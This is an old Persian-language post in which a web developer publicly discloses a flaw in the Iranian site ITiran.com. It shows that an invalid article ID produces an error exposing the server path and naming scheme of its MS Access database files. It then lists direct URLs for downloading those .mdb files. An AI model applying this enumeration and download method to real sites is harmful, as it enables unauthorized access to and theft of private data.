بخش خبر آی تی ایران – من محمدرضا ثروتى هستم با سايت Servaty.net من مهندس صنايع خواندم و متى هم در يک شرکت طراحى وب سايت مدير پروژه بودم . يادم مى آد که درست در بهار سال 1382 به مديران سايت ITiran.com ايميل زدم و گفتم که اگر بخواهيد مى توانم در طراحى مجدد سايتتان با شما همکارى کنم ولى بعد از چند روز ايميلى دريافت کردم که گفته بود نيازى به همکارى نداريم و خودمان در حال طراحى مجدد سايت هستيم .
من به دليل کارم عموما به سايت ITiran.com سر مى زنم و مطالب انرا مرور مى کنم در خيلى از مواقع مى بينم که مسئولين اين سايت از Hack هک شدن سايت هاى ديگران مطالبى را منتشر مى کنند و بعضى مواقع هم به شکلى تمسخر آميز ازمسئولان ديگر سايت ها انتقاد مى کنند .
من ادعايى در زمينه هک و اين جور مسائل ندارم و فقط با قصد روشن سازى وضع امنيتى سايت ها در ايران و خصوصا سايت ITiran.com روش دانلود تمامى DataBase هاى سايت ITiran.com را که از تکنولوژى Asp و ديتا بيس MS Access استفاده است را در ذيل مى آورم تا ببينيد که به چه راحتى مى توان به اطلاعات سايت دسترسى پيدا کرد:
قالب نمايشى اطلاعات سايت به شکل http://www.itiran.com/artic/show.asp?no=8212941621 مى باشد .
حال شما به جاى ادرس بالا که جهت نمايش يکى از مقالات به کار مى رود کافيست آدرس را به آدرس غير موجود زير تغيير دهيد http://www.itiran.com/artic/show.asp?no=8412941621
حال با خطاى زير مواجه مى شويم:
Microsoft JET Database Engine error ‘80004005’
Could not find file ‘D:\wwebfolders\parnam\itiran\itiran.com\www\artic\db\8412.mdb’.
/artic/main_artic.asp, line 9
خوب حالا با کمى دقت مى توانيد مسير فايل هاى mdb سايت را حدس بزنيد بله درسته
اطلاعات هر ماهه سايت در بخش مقالات و ديگر بخش ها در فايل mdb به آدرس سال و ماه انتشار ذخيره مى گردد حال مى توانيد فايل هاى mdb را به شکل زير دانلود کنيد فقط کافيست که آدرس فايل را تايپ کنيد و انرا دانلود کنيد.
http://www.itiran.com/artic/db/8201.mdb
http://www.itiran.com/artic/db/8202.mdb
http://www.itiran.com/artic/db/8203.mdb
http://www.itiran.com/artic/db/8204.mdb
….
اميدوارم مسئولين تمامى سايت ها و مخصوصا سايت ITiran.com فکرى به حال سايت خود بکنند.
